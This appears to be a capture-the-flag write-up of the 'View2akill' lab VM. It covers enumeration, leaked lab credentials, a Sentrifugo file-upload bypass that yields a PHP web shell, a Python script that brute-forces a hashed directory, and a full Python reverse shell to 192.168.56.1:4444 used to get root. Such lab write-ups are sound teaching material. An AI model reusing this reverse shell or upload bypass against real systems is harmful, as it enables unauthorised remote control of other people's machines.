mzfr@home:~$

View2akill writeup

Box Author: Melvin C

Nmap

so there is a SMTP server there and also there is a HTTP service on port 8191.

Let’s start our enumeration from HTTP service.


HTTP

we can see a really cool looking GIF. I ran gobuster on the website and found we directories:

The first thing I checked was the robots.txt

From there I decided to look into /zorin and there I found hr.html which had a message

In the mean time use /sentrifugo for current HR mgmt.

During this transition period all new users (from now on) will have their sentrifugo passwords automatically set to toor so no real email address is required for the system to send the initial automatically generated password. Please be patient as the reset to toor may take up to a minute.

Then in /dev I found some files.

The first thing I downloaded from that one was e_bkup.tar.gz which had 3 rtf file and one of them named New_Employee_Onboarding_Chuck.rtf had some information on what the password for Chuck would be.

Greeting Chuck, We welcome you to the team! Please login to our HR mgmt portal(which we spoke of) and fill out your profile and Details. Make sure to enter in the descrption of your CISSP under Training & Certificate Details since you mentioned you have it. I will be checking that section often as I need to fill out related paperwork. Login username: chuck@localhost.com and password is the lowercase word/txt from the cool R&D video I showed you with the remote detonator + the transmit frequency of an HID proxcard reader - so password format example: facility007. Sorry for the rigmarole, the Security folks will kill me if I send passwords in clear text. We make some really neat tech here at Zorin, glad you joined the team Chuck Lee! }

So after looking at the remote_control.gif I found out that the password was helicopter125. Now on the /zorin/hr.html we found out that for HR mgmt we need to visit /sentrifugo.

Using chuck@localhost.com - helicopter125 I was able to login into the HR system. Now I looked around but didn’t found anything then I used searchsploit and found out that there were 3 vulnerabilities.

The crazy part is that all these vulnerabilities are actually found by the box author himself.

I tried the XSS vulnerability but that didn’t worked for (it worked for @andreaz) so I decided to use the File Upload Restriction Bypass. In that exploit two places are mentioned to upload the shell:

/sentrifugo/index.php/mydetails/documents -- Self Service >> My Details >> Documents (any permissions needed)
sentrifugo/index.php/policydocuments/add -- Organization >> Policy Documents (higher permissions needed)

But none of them were accesible, then @theart42 found that we are allowed to upload the expense report in /sentrifugo/index.php/expenses/expenses.

You can follow the exploit to get the RCE on the system. All you need to do is upload a file named shell.php.doc and while uploading edit the file name to shell.php and then save it. Then you need to visit

http://192.168.56.136/sentrifugo/public/uploads/expense_receipt_temp/1573960913_3_shell.php

And to be able to execute command we need to enter parameter ?cmd=

Once I had the RCE I tried executing the nc command but I was not able to run them. So I uploaded a php reverse shell and then executed it which gave me the shell.


Privilege escalation

In the /home/jenny I found a zip file.

I downloaded the zip file and then unzipped it and it gave out password.txt and todo.txt

hr mgmt:
jenny@localhost.com - ThisisAreallYLONGPAssw0rdWHY!!!!

ssh
jenny - !!!sfbay!!!

Using those SSH credential I logged into jenny’s account.

I started looking around and in /home/max I found a note.txt which read

Max,

The electronic controller web application you asked for is almost done. Located on port 8191 this app will allow you to execute your plan from a remote location.

The remote trigger is located in a hidden web directory that only you should know - I verbally confirmed it with you. If you do not recall, the directory is based on an algorithm:  SHA1(lowercase alpha(a-z) + "view" + digit(0-9) + digit(0-9)).

Example: SHA1(rview86) = 044c64c6964998ccb62e8facda730e8307f28de6 = http://<ip>:8191/044c64c6964998ccb62e8facda730e8307f28de6/

- Scarpine

This mean we need to write a code to be able to do that. To brute force the path I wrote a script in python which found the correct path for me:

import string
from hashlib import sha1

import requests

URL = "http://192.168.56.136:8191/{}"
paths = []

for alpha in string.ascii_lowercase:
    for n in string.digits:
        for m in string.digits:
            path = sha1((alpha + "view" + n + m + "\n").encode("utf-8")).hexdigest()
            paths.append(path)


for i in paths:
    url = URL.format(i)
    r = requests.get(url)
    if len(r.content) > 167:
        print(url)
        break

With this I was able to find the correct URL to visit:

http://192.168.56.136:8191/7f98ca7ba1484c66bf09627f931448053ae6b55a

When I opened that URL I got a page with huge red button in it.

When we hit that button we get

This mean it’s executing the code that is supposed to be in aView.py because following was the content of aView.py

so I copied the following code in that python file:

import socket,subprocess,os
import pty

s=socket.socket(socket.AF_INET,socket.SOCK_STREAM)
s.connect(("192.168.56.1",4444))
os.dup2(s.fileno(),0)
os.dup2(s.fileno(),1)
os.dup2(s.fileno(),2)
pty.spawn("/bin/bash")

And then pressed that red button to get shell as root.

Then I got the root flag.


Oh this was an awesome machine just like other machines by creosote. I really enjoyed this, especially the fact that initial foothold depends on the vulnerabilities that were found by the author himself. 😱😱

Thanks for this awesome machine. Also thanks to @theart42 and @4nqr34z for the help.


Thanks for reading, Feedback is always appreciated.

Follow me @0xmzfr for more “Writeups”. And if you’d like to support me considering donating 😄